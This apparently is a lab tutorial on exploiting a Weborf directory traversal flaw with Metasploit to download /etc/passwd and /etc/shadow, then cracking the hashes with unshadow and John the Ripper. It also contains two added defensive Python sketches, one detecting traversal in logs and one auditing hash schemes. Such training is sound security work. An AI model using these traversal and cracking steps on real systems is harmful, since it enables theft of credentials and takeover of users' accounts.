• Lucifer

Post-Exploit Password Cracking

In previous posts, we covered several different ways of obtaining the contents of the /etc/shadow file where user password hashes are stored. In this post, we will go through yet another way of grabbing the /etc/shadow file from the compromised system. We will then go through the steps of cracking the hashes to obtain the actual password values. So let's see step by step how we can do post-exploit password cracking.

Step 1: Starting Vulnerable Server

First, let's start our vulnerable server application as root:

sudo weborf

Now open a new terminal tab with Ctrl + Shift + T.

Step 2: Creating File List

We already saw how the directory traversal vulnerability in Weborf can be exploited manually. In this post, we will automate the process with Metasploit and combine it with downloading the password files. The Metasploit auxiliary module that we will use requires a file list to know which files to download from the compromised system. Create the file list as instructed below. We use URL encoding to replace "/" with "%2f":

cat > files.txt
etc%2fpasswd
etc%2fshadow

Press ENTER, then hit Ctrl+D to save the file and return to the prompt.

Step 3: Starting Metasploit Framework

Now start the Metasploit Framework. Don't forget the -L option.

msfconsole -L

Step 4: Selecting Module

Next, let's select the Generic HTTP Directory Traversal Utility module. It checks the targets for the directory traversal vulnerability and depending on the selected option, can download specific files or check if it is possible to write files outside of the www directory. Select the module as follows:

use auxiliary/scanner/http/http_traversal

Step 5: Setting Scanner Options

There are quite a few options we need to set for this module. The first two should be familiar by now: RHOSTS for the remote (target) host(s) and RPORT for the target port (which is set to 80 by default, so we need to change it to Weborf's default port). The next three options are TRIGGER, for the path that triggers the vulnerability; ACTION, which in our case is DOWNLOAD; and FILELIST, which specifies the list of files to download. Set the options exactly as shown below:

set RHOSTS skillsetlocal.com
set RPORT 8080
set TRIGGER ..%2f..%2f..%2f..%2f..%2f..%2f..%2f
set ACTION DOWNLOAD
set FILELIST files.txt

Make sure to use all capital letters for DOWNLOAD; otherwise, you will get an error.

Step 6: Running Scan

Now enter run to launch the attack.


The scan should finish very quickly, and you should see that our target files were downloaded. Note the location where the files were saved; we will use it in the next step.

Enter exit to close Metasploit Framework and return to the regular prompt.
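From the server side, the requests this module sends are easy to spot once the path is percent-decoded. The following detection sketch is an added example, not part of the original post; it assumes Common Log Format access-log lines (constructed below, not real Weborf output), and the function names are hypothetical.

```python
import re
from urllib.parse import unquote

# Constructed sample lines; Common Log Format is an assumption, not Weborf's real output.
SAMPLE_LOG = """\
192.0.2.10 - - [26/Aug/2020:07:15:14 +0000] "GET /index.html HTTP/1.1" 200 512
192.0.2.77 - - [26/Aug/2020:07:15:15 +0000] "GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1843
192.0.2.77 - - [26/Aug/2020:07:15:15 +0000] "GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow HTTP/1.1" 200 1120
192.0.2.10 - - [26/Aug/2020:07:16:02 +0000] "GET /docs/a..b/file%2ftxt HTTP/1.1" 404 0
192.0.2.99 - - [26/Aug/2020:07:17:40 +0000] "GET /%252e%252e%252fetc%252fshadow HTTP/1.1" 404 0
""".splitlines()

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
SENSITIVE = ("/etc/shadow", "/etc/passwd")


def fully_decode(path, max_rounds=3):
    """Percent-decode repeatedly so double-encoded separators are exposed."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def find_traversal(lines):
    """Return (client, status, decoded_path, hits_sensitive_file) per traversal request."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, _method, raw_path, status = m.groups()
        path = fully_decode(raw_path).replace("\\", "/")
        if ".." not in path.split("/"):
            continue  # no parent-directory segment once decoded ("a..b" is fine)
        sensitive = any(path.endswith(s) for s in SENSITIVE)
        findings.append((client, int(status), path, sensitive))
    return findings


if __name__ == "__main__":
    for finding in find_traversal(SAMPLE_LOG):
        print(finding)
```

A finding with status 200 on a sensitive path means the file was actually served, which on a server running as root includes /etc/shadow.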


Step 7: Unshadow

For the purpose of cracking, we’ll use John the Ripper. Here’s a description from its maker, Openwall:

John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS (the latter requires a contributed patch). Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos/AFS and Windows LM hashes, as well as DES-based tripcodes, plus many more hashes and ciphers in "community enhanced" -jumbo versions and/or with other contributed patches.

Reference - http://www.openwall.com/john/doc/

Sounds like it’s perfect for the job. We could run JtR directly on the /etc/shadow file, but a better approach is to create a new file with unshadow, which lets JtR also use some of the GECOS field information from the /etc/passwd file. Use unshadow as follows, specifying the files downloaded by the Metasploit module. The format is unshadow PASSWD-FILE SHADOW-FILE, in that order, so make sure you enter the file names in the correct order. The yyyymmddhhmmss part is the timestamp, and xxxxxx and yyyyyy are numeric identifiers, which will be different for /etc/passwd and /etc/shadow. We are saving the new file as passwords.

sudo unshadow .msf4/loot/yyyymmddhhmmss_default_127.0.0.1_lfi.data_xxxxxx.txt .msf4/loot/yyyymmddhhmmss_default_127.0.0.1_lfi.data_yyyyyy.txt > passwords

For example:

sudo unshadow .msf4/loot/20200826071515_default_127.0.0.1_lfi.data_827959.txt .msf4/loot/20200826071515_default_127.0.0.1_lfi.data_297245.txt > passwords

Let's view the new file to make sure everything went OK:

cat passwords
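The combined file is also what an administrator can audit to see which accounts would fall first. The sketch below is an added example, not part of the original post; it reads unshadow-style lines (user:hash:uid:gid:gecos:home:shell) and reports the hash scheme per account, flagging empty password fields and legacy schemes. The sample lines and function names are constructed, and the hash bodies are placeholders.

```python
# Constructed unshadow-style input; hash bodies are placeholders, not real hashes.
SAMPLE = """\
root:$6$SALTSALT$PLACEHOLDERHASHBODY:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:$1$SALTSALT$PLACEHOLDERHASHBODY:1000:1000:Alice Example,,,:/home/alice:/bin/bash
bob:$y$j9T$SALTSALT$PLACEHOLDERHASHBODY:1001:1001:Bob Example:/home/bob:/bin/bash
carol:!$6$SALTSALT$PLACEHOLDERHASHBODY:1002:1002::/home/carol:/bin/bash
dave::1003:1003::/home/dave:/bin/bash
legacy:XXPLACEHOLDER:1004:1004::/home/legacy:/bin/sh
"""

# crypt(3) identifier -> (scheme name, needs attention)
SCHEMES = {
    "1": ("md5crypt", True),       # legacy scheme, cheap to attack offline
    "2a": ("bcrypt", False),
    "2b": ("bcrypt", False),
    "2y": ("bcrypt", False),
    "5": ("sha256crypt", False),
    "6": ("sha512crypt", False),
    "y": ("yescrypt", False),
}


def classify(field):
    """Map one account's password field to (scheme, needs_attention)."""
    if field == "":
        return "empty", True        # no password required for this account
    if field[0] in "!*":
        return "locked", False      # password login disabled
    if field.startswith("$"):
        ident = field.split("$")[1]
        return SCHEMES.get(ident, ("unknown", True))
    if len(field) == 13:
        return "descrypt", True     # traditional DES crypt: 8-char limit, 12-bit salt
    return "unknown", True


def audit(text):
    """Return {user: (scheme, needs_attention)} for every well-formed line."""
    report = {}
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) < 7:
            continue                # not a passwd-style record
        report[parts[0]] = classify(parts[1])
    return report
```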

Let's get cracking!

Step 8: Running John the Ripper

Issue the following command to use JtR with our passwords file with default options.

sudo john passwords

Understand that the crack could take days in a real scenario. But simple passwords like “password1” or “password2” should be cracked very quickly.

Step 9: Reading Wordlist

For stronger passwords, we can look at the available JtR options, such as using a wordlist. There are many large wordlists available on the Internet, some of them included with the standard Kali Linux installation. You can also create your own, which we did for this lab. Issue the following command to read it:

cat wordlist.txt

To speed up the process, we cheated a bit and included only the actual user passwords. Feel free to experiment later and try adding more words or use different JtR options.

Step 10: Running JtR with Wordlist

To use the wordlist, simply reissue the command and add the -w option pointing to the file:

sudo john passwords -w=wordlist.txt

You can see the rest of the passwords.

Also notice that John picks up where it left off, only cracking the passwords that weren't cracked in the previous sessions.

Step 11: Viewing Cracked Passwords

To see the passwords extracted from a certain file, use the --show option as follows:

sudo john --show passwords

©2020 by Payground